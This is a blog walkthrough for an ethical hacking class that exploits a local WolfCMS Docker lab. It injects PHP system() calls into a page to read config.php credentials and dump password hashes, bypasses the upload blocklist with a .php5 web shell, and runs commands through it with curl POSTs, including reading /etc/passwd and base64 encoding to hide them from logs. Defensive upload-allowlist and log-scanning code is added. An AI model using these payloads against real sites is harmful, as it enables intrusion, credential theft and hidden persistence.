In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub images to refresh my knowledge of the tools that can be used, and to provide step-by-step walk-through exercises that students can follow.
Previous posts that can assist with this walkthrough:
1. Billu_b0x - Highlights a Local File Inclusion vulnerability
2. Seattle - Highlights Brute Forcing a Login and XSS
3. Zico2 - Highlights directory traversal and PHP Command Injection
4. Docker with WolfCMS and MySQL Images - Prerequisite for this post...
Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer
Kali Linux Distro VM (Downloaded the VM edition from kali.org)
1 - docker
2 - docker image called wolfcms/wolfcms
3 - docker image called mysql
4 - Create a MySQL user and set a password for that MySQL user
Disclosure: I disclosed the vulnerabilities listed below to WolfCMS on November 4, 2017 and November 13, 2017. I have received no response from them.
Lab
1. After loading the docker images from the last post for MySQL and WolfCMS, the WolfCMS configuration was retained; however, the MySQL configuration and data were not.
2. Follow the previous lab to set up MySQL, or find a different image so that when you commit the changes they are retained. You can pull down an ubuntu image and run "apt-get update; apt-get install net-tools mysql-server zip wget".
3. After you log in as the admin from the URL http://172.17.0.2/?/admin/login you should see the following page. For now we are going to work with the "About Us" page.
4. Knowing from the setup of the web page that this is programmed in PHP, we are going to try to get PHP code to execute in the body of this "About Us" page.
String: <?php echo "test"; ?>
5. Notice that the "About Us" page interprets the PHP and returns the word "test". Sweet!
6. I am going to try running system commands, capture the output and display it on the "About Us" page. Ordinarily the system() function should be disabled in the PHP configuration.
Strings:
<?php
echo "\n\nLocal Info\n\n";
echo '<pre>';
system('pwd');
system('whoami');
system('ls -lha');
echo '</pre>';
?>
7. Wow! That worked: it pulled back the present working directory (pwd), the user the web server is running as, and the listing of the current directory. We can execute shell commands through PHP as long as the www-data user has permission to do so.
8. Normally in a configuration file you can find a username and password for the database. Let's try to get the contents of the config.php file by adding a command to cat it.
String: system('cat /var/www/html/wolfcms/config.php');
9. Looking at the "About Us" page for the output shows that it probably did not work.
10. Let's check the source of the page by right-clicking on it and choosing "view source". Notice that config.php is actually there: the browser simply does not render the <?php ... ?> tags that cat returned. We can quickly see that the database username and password are displayed.
11. We have the database credentials and we can execute PHP. Let's explore the database using this information. Let's add the following PHP code to connect to the database and return the list of tables in the database "wolf".
12. And the results are...
13. Now let's look inside the user table, but first let's display the columns of the table.
14. And the results of the fields in the table user...
15. Now let's display the name, email, username, password and salt.
16. The results are displaying the password and the salt.
17. With the above vulnerabilities you have full access to run any command you like on the file system with the permissions of the www-data user, and full access to the database. Remember, with PHP code execution you can insert and update records.
18. Really quick, stored XSS exists on this page also.
19. The above vulnerabilities allow us to execute operating system commands, steal cookies with stored XSS, query the database and much more. However, to understand attackers: if the database does not contain information they can sell, they look for a way to persist so they can use the site in other ways. One way they gain persistence is through a web shell, which lets them execute commands and gather the results. For this first exercise we are going to upload a simple web shell. Navigate to the file manager.
20. On Kali, under the directory /usr/share/webshells/php, there is a file called simple-backdoor.php. If you read about the latest WolfCMS update, you will see that PHP file extensions were blocked from being uploaded. If you attempt to upload simple-backdoor.php it will fail and not complete. Sometimes as a penetration tester you need to look at the source code. In the source code you can see that the blocked extensions are .php, .php3, .php4, and .inc. However, as you try the other extensions that PHP can be served under, you will find that .php5 is not blocked. You can copy simple-backdoor.php to simple-backdoor.php5 and the upload will succeed.
Command: cp /usr/share/webshells/php/simple-backdoor.php /usr/share/webshells/php/simple-backdoor.php5
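As an added example, not part of the original post or of WolfCMS itself, the following Python reproduces the extension blocklist found in the file manager source above and compares it with the allowlist check a hardened upload handler would use; the allowlist contents are assumed for the example.

```python
import os
import re

# Extensions the WolfCMS file manager rejects, as read from its source above.
WOLFCMS_BLOCKLIST = {".php", ".php3", ".php4", ".inc"}

# The corrected approach: accept only what the site actually needs.
# (Assumed allowlist for this example; adjust to the real site's needs.)
UPLOAD_ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}

_SAFE_STEM = re.compile(r"[A-Za-z0-9_-]+")


def blocklist_allows(filename: str) -> bool:
    """Reproduces the blocklist check: only the listed extensions are refused,
    so simple-backdoor.php5 (and .phtml, .phar, ...) slips through."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in WOLFCMS_BLOCKLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: strip any directory part, require a plain stem, and
    require every dotted suffix to be on the allowlist, so 'shell.php5',
    'shell.php.png' and '.htaccess' are all rejected."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) < 2 or not _SAFE_STEM.fullmatch(parts[0]):
        return False
    return all("." + suffix.lower() in UPLOAD_ALLOWLIST for suffix in parts[1:])


def compare(filename: str) -> dict:
    """Show both verdicts side by side for one candidate upload name."""
    return {
        "name": filename,
        "blocklist": blocklist_allows(filename),
        "allowlist": allowlist_allows(filename),
    }


if __name__ == "__main__":
    for name in ("simple-backdoor.php", "simple-backdoor.php5",
                 "shell.php.png", "../../logo.png", "logo.png"):
        print(compare(name))
```

A second layer the steps above motivate: configure the web server so that nothing under the upload directory is executed as a script, so even a misnamed file cannot run.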
21. Before you upload the simple-backdoor.php5 file you should look at its source code and understand what it is going to do. If you navigate to the file that you uploaded you will see the following in the browser.
22. The web shell allows you to execute any command that the www-data user can with its privileges. I am going to run the command as shown to display the contents of the /etc/passwd file.
23. Remember that if you pass parameters in the URL, the parameters will appear in the web server logs. I am going to modify the backdoor script to read a POST parameter instead. I copied it to sb-post.php5 and then uploaded it.
24. Now if you browse to the page you will not see anything on it. I am going to use curl to make a POST request with the command that I would like to execute.
Command: curl -d "cmd=ls" -X POST http://172.17.0.2/public/sb-post.php5
25. With the above backdoor I can return the output of the commands I would like to execute. Remember that you can also chain commands together.
Command: curl -d "cmd=whoami;ls -lha;cat /etc/passwd" -X POST http://172.17.0.2/public/sb-post.php5
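As an added example that is not part of the original post, the following Python checks combined-format access log lines for the traces steps 22 to 25 leave on the server: the GET backdoor's cmd= showing up in the query string, and a POST to a .php5 file under /public/ whose body, as step 23 notes, never reaches the log. The log lines are constructed to mirror those requests.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined-format access line (enough fields for this check).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Names a PHP-capable server may execute; .php5 is the one the walkthrough used.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|inc)$", re.IGNORECASE)
# WolfCMS serves uploaded files from /public/ (per the URLs above).
UPLOAD_DIR = "/public/"


def flag_request(line: str) -> list:
    """Return the reasons one access-log line looks like web-shell traffic."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    reasons = []
    if url.path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(url.path):
        reasons.append("script extension served from upload directory")
    if "cmd" in parse_qs(url.query):
        reasons.append("command visible in query string")
    if m["method"] == "POST" and url.path.startswith(UPLOAD_DIR):
        reasons.append("POST to upload directory (body not logged)")
    return reasons


def scan(lines) -> list:
    """Return (path, reasons) for every flagged line, in order."""
    hits = []
    for line in lines:
        reasons = flag_request(line)
        if reasons:
            hits.append((urlsplit(LOG_RE.match(line)["target"]).path, reasons))
    return hits


# Constructed sample lines mirroring the requests made in steps 22 and 24.
SAMPLE_LOG = [
    '172.17.0.1 - - [13/Nov/2017:10:01:02 +0000] "GET /public/simple-backdoor.php5?cmd=cat+/etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '172.17.0.1 - - [13/Nov/2017:10:02:15 +0000] "POST /public/sb-post.php5 HTTP/1.1" 200 410 "-" "curl/7.56.1"',
    '172.17.0.1 - - [13/Nov/2017:10:03:00 +0000] "GET /public/images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_LOG):
        print(path, "->", "; ".join(reasons))
```

The POST line is caught only because a script is being served from the upload directory, which is why the upload event itself, not the request body, is the reliable thing to alert on.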
26. With the backdoor you can see that the commands are sent in plain text. You may want to find a way to obfuscate them or make the string harder to identify. Malware and backdoors often use encryption to hide the commands sent and received. I am going to use Base64 encoding to pass the commands to the web shell. First let's modify the web shell to decode a base64-encoded string.
27. Now, using bash to base64-encode the command we want to send, and curl to send it, we receive the results.
28. Granted, you probably want the output encoded as well when you receive it back from the web server.
Challenge: Change the output to be base64 encoded.
Challenge: Write a python script that reads a command as input, base64-encodes it, sends it, receives the results, and decodes them. After this process, read another command as input.
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.